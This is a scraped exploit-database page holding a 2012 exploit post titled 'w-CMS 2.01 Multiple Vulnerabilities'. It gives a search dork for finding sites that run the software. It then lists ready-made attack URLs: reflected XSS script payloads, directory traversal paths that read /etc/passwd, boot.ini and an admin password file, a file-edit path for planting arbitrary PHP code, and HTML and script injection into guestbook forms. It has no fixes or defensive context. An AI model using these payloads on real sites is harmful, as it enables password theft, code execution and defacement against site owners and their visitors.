Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtTh3.g4m3_0v3r1337DAY-ID-17363
HistoryJan 10, 2012 - 12:00 a.m.

w-CMS 2.01 Multiple Vulnerabilities

2012-01-1000:00:00
th3.g4m3_0v3r
0day.today
7
JSON

Exploit for php platform in category web applications

# Exploit Title: W-Cms Multiple Vulnerability
# Date: 2012-01-09
# Author: th3.g4m3_0v3r
# Site:http://w-cms.info/
# Software Link: http://code.google.com/p/wcms/
# Dork: intext:"Powered by w-CMS"
# Version : [2.01]
# Tested on: Window 7
# Yogesh Kashyap, shubneet goel, w4rl0ck.d0wn, Chip, VzAcnY, Razzy, Sayan, Jaggi Panu, Darkgt
# www.h4ck3r.in, www.root-team.com, www.hackingmind.com, www.hackingcrackingtricks.in
 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
www.h4ck3r.in            www.root-team.com             www.hackingmind.com
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
W-CMS cross site scripting
_______________
 
Vulnerable Link __________\/_____________________
_______________
 
http://localhost/index.php?bid=1&COMMENT=1 "XSS"
http://localhost/?p=3"XSS"
http://localhost/?bid=5&p=1"XSS"
 
 
http://localhost/?p=3<FORM action="Default.asp?PageId=-1"
method=POST id=searchFORMname=searchFORM
  style="margin:0;padding:0"><INPUT type="hidden" value=""
name="txtSEARCH"></FORM>

~ [PoC]Http://[victim]/path/?p=<script>alert('1')</script>
~ [PoC]Http://[victim]/path/index.php?p=<script>alert('1')</script>
 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
directory traversal attacks
 
This script is possibly vulnerable to directory traversal attacks
 
http://localhost/wcms-2.01_2/?p=../../../../../../../../../../windows/win.ini
http://localhost/wcms-2.01_2/?p=../../../../../phpMyAdmin/db_create.php

~ [PoC]Http://[victim]/path/?p=../../../../../../boot.ini
~ [PoC]Http://[victim]/path/index.php?p=../../../../../../boot.ini
~ [PoC]Http://[victim]/path/?p=../../../../../../etc/passwd
~ [PoC]Http://[victim]/path/index.php?p=../../../../../../etc/passwd
# Admin Pass Disclosure
~ [PoC]Http://[victim]/path/index.php?p=../../password

 

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Local File Edit/Write
~ [PoC]Http://[victim]/admin.php?edit=../../../1.php
 
Just Fill The Text Area With Evil Code (Php) & Click Save
 

 
+----------------------------------------------------------------------+
 
Html Code Injection
~ [PoC]Http://[victim]/path/(Guestbook Path)Or(Contact Path)
You Can Inject Html Code In The text Area
Exapmle : <H3>Own3d</H3>
++ You Can Inject Xss Too
Exapmle : <script>alert('1')</script>
 
+----------------------------------------------------------------------+

 
Greetz To : 1337day.com ~ exploit-db.com ~ hackforums.net



#  0day.today [2018-02-19]  #
JSON